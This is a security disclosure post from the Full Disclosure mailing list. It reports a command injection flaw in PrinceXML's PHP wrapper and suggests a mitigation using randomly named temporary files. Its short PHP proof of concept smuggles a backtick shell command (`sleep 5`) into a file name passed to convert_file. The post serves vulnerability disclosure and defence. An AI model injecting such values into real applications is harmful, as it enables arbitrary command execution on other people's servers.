While grabbing a copy PrinceXML, I noticed the company also offered some
wrapper classes in various languages for using prince in server applications
(web applications).
http://www.princexml.com/download/wrappers/
<http://www.princexml.com/download/wrappers/>
Taking a quick look at the PHP class, there are likely numerous command
injection vulnerabilities. I was able to prove a quick PoC out. Some quick
googling yielded more results that expected, so PrinceXML and PHP seem kind of
popular?
<?php
ini_set('display_errors', '1');
error_reporting(-1);
require 'prince.php';
$exepath='/usr/bin/prince';
$prince= new Prince($exepath);
$prince->setHTML(TRUE);
$prince->setLog('prince.log');
$xmlPath='/Applications/MAMP/htdocs/test/new`sleep 5`html.html';
$msgs= array();
$convert=$prince->convert_file($xmlPath, $msgs);
?>
——————
Note how $xmlPath has bash ticks in it to call sleep. Passing an
attacker-controlled file name to the convert_file function can result in
command injection.
You can use this safely. Using the temporary file mechanisms in PHP to save the
user’s file to a randomly named file on the FS, then passing this random name
you can trust to convert_file would be fine. That being said, I have no idea
what the common permutations of code is for the PrinceXML PHP library and
haven’t looked for any more. It seems obvious there will be more vectors.
I haven’t looked at the others. If C# and Java are using the correct classes
such as invoking an array of strings as the command and arguments as opposed to
a straight up concatenated string, they may be safe. The Rails wrapper seems
unofficial.
I also started getting really sad while working on this and had to listen to
Purple Rain. RIP
Attachment:
signature.asc
Description: Message signed with OpenPGP using GPGMail
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/